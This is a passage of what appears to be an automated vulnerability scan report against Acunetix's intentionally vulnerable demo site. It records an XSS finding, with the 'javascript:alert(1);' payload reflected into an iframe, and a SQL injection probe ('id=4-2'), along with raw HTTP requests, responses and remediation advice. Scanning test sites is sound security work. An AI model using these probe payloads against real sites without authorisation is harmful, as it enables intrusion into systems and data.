aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFFGphdmFzY3JpcHQ6YWxlcnQoMSk7ZGQzvo47hQg5wK0PpdlFgvCFi0HdJQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLC0a+LDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8s69RmrC7Xn7opyEj4DL1LJe6q9w==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="javascript:alert(1);" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          NewsAd
          Attack
          javascript:alert(1);
          Evidence
          javascript:alert(1);
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.

          Phases: Implementation; Architecture and Design

          Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.

          For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.

          Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.

          Phase: Architecture and Design

          For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

          If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.

          Phase: Implementation

          For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.

          To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.

          Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

          When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."

          Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.

      3. SQL Injection (2)
        1. GET http://testaspnet.vulnweb.com/Comments.aspx?id=4-2
          Alert tags
          Alert description

          SQL injection may be possible.

          Other info

          The original page results were successfully replicated using the expression [4-2] as the parameter value

          The parameter value being modified was stripped from the HTML output for the purposes of the comparison

          Request
          Request line and header section (343 bytes)
          GET http://testaspnet.vulnweb.com/Comments.aspx?id=4-2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          Content-Length: 0
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:08:37 GMT
          Content-Length: 39227
          
          
          Response body (39227 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>Comments</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="Comments.aspx?id=4-2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFgoCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kAgkPZBYCAgEPZBayAmYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIBD2QWAmYPFgIeBWNsYXNzBQdDb21tZW50ZAICD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIDD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCBA9kFgJmDxYCHwMFB0NvbW1lbnRkAgUPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAgYPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIHD2QWAmYPFgIfAwUHQ29tbWVudGQCCA9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCCQ9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAgoPZBYCZg8WAh8DBQdDb21tZW50ZAILD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIMD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCDQ9kFgJmDxYCHwMFB0NvbW1lbnRkAg4PZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAg8PZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIQD2QWAmYPFgIfAwUHQ29tbWVudGQCEQ9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCEg9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAhMPZBYCZg8WAh8DBQdDb21tZW50ZAIUD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIVD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCFg9kFgJmDxYCHwMFB0NvbW1lbnRkAhcPZBYCZg8WAh8BBSQ8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYWZ0ZXIuZ2lmIj5kAhgPZBYCZg8WAh8BBSU8SU1HIHNyYz0iaW1hZ2VzL2NvbW1lbnQtYmVmb3JlLmdpZiI+ZAIZD2QWAmYPFgIfAwUHQ29tbWVudGQCGg9kFgJmDxYCHwEFJDxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1hZnRlci5naWYiPmQCGw9kFgJmDxYCHwEFJTxJTUcgc3JjPSJpbWFnZXMvY29tbWVudC1iZWZvcmUuZ2lmIj5kAhwPZBYCZg8WAh8DBQdDb21tZW50ZAIdD2QWAmYPFgIfAQUkPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWFmdGVyLmdpZiI+ZAIeD2QWAmYPFgIfAQUlPElNRyBzcmM9ImltYWdlcy9jb21tZW50LWJlZm9yZS5naWYiPmQCHw9kFgJmDxYCHwM